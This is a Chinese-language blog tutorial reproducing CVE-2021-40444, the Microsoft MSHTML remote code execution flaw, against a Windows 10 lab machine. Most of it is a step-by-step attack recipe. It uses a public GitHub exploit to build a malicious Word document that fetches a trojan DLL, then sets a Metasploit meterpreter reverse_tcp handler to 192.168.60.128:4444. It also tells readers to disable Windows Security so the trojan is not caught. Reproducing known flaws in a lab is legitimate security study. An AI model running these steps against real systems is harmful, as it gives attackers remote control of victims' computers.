CVE-2021-40444-Microsoft MSHTML远程命令执行

  • 2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。

1、漏洞详情:

  • Microsoft MSHTML远程代码执行漏洞
  • CVE-2021-40444
  • 严重级别:严重 CVSS:8.8
  • 被利用级别:检测到利用
  • 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。
  • 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档。

2、复现:

  • 下载代码,到kali上:
  • https://github.com/lockedbyte/CVE-2021-40444
  • 没有安装kali的小伙伴,可以参照这篇文章
Kali linux最新版 安装方法以及常见问题解答-安全小天地
Kali linux最新版 安装方法以及常见问题解答-安全小天地
Kali linux最新版 安装方法以及常见问题解答
沐寒的头像-安全小天地大咖2022年2月8日 15:18

081413

  • 接着我们把源码复制到kali虚拟机上面
图片[1]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地
  • 接着我们安装依赖,基本上直接复制,终端跑一边就好,我这里因为安装过了,所以提示会和你们不一样
sudo apt-get install lcab
图片[2]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地

打开msf生成dll木马文件

  • 这里的ip需要自己去ifconfig获取一下,msf端口监听默认4444
图片[3]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地
  • 接着我们生成恶意文档,将刚刚生成的dll文件,复制到下载的CVE-2021-40444-master文件夹中执行命令
python3 exploit.py generate http.dll http://192.168.60.128
  • 生成后保存在CVE-2021-40444/out/document.docx
图片[4]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地
  • 我们将该文档复制到win10靶机当中,然后依次开启msf和当前木马的监听

msf监听

依次输入一下命令

msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
options
set lhost 192.168.60.128
set lport 4444
exploit
图片[5]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地

恶意文档监听

 python3 exploit.py host 80
图片[6]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地
  • 接着我们去win10里面打开刚刚生成的文档
图片[7]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地

然后我们查看kali监控就会发现,已经成功获取权限了

图片[8]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地
图片[9]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地
  • 当然这里面涉及木马免杀等程序,自己复现漏洞的时间,关闭安全中心就行
  • 感谢大家看到这里,写文章不易,谢谢
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容